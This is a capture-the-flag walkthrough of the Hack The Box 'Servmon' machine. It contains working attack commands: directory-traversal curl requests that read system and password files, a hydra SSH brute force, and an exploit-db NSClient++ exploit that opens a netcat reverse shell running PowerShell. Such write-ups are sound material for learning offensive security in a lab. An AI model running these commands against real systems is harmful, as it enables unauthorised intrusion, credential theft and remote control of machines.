Servmon

March 01, 2025

---

Created by	Page	Difficulty	OS
del_KZx497Ju	Hack The Box	Easy	Windows

---

• The first step is to perform a scan of the open ports and then list the versions and technologies used on the open ports.

    nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.10.184 -oG scan
    /opt/extractports scan
    nmap -p21,22,80,135,139,445,5666,6063,6699,8443,49664,49665,49666,49667,49668,49669,49670 -sCV -Pn 10.10.10.184 -oN ports
  

  

• In this survey I find the possibility to enumerate by ftp using anonymous credentials.

    ftp 10.10.10.184
        anonymous:anonymous
  

  

  

  

• Only with the found files I can’t do anything at the moment, I am still looking at the rest of the found ports.

• On port 80 I find nvms-1000 running. When searching for information about this CMS I find a vulnerability that allows to read files by doing a directory path traversal.

  

• Making use of this vulnerability and using the information collected in the ftp files found, I manage to read a file that was referenced and contains possible passwords.

    curl http://10.10.10.184/../../../../../../../../Windows/System32/Drivers/etc/hosts  --path-as-is
    curl http://10.10.10.184/../../../../../../../../Users/Nathan/Desktop/Passwords.txt  --path-as-is
  

  

• I validate the passwords found with the 2 users I know at the moment and find the credentials of one of them.

    hydra -L usernames -P passwords  ssh://10.10.10.184
  

  

• With these credentials I connect to the system via ssh and I manage to read the first flag

  

• When searching through the system files I find one that is not common. NSClient++. When searching for information about this one I find that there is a vulnerability that allows to have RCE once authenticated.

  

• Searching through your files I find a password. I share the port through which this application is running to my system and verify that it is correct.

    ssh Nadine@10.10.10.184 -L 9999:127.0.0.1:8443
  

  

• I try to follow the steps found to exploit this vulnerability but I am not able to due to the inconsistency of the application. I search for a PoC and find one in exploitdb. Using it I get an interactive console as nt autority and I manage to read the second flag.

    python3 48360.txt -t 127.0.0.1 -P 9998 -p ew2XXXXXXXXXOT -c "C:\\temp\\nc64.exe 127.0.0.1 9001 -e powershell"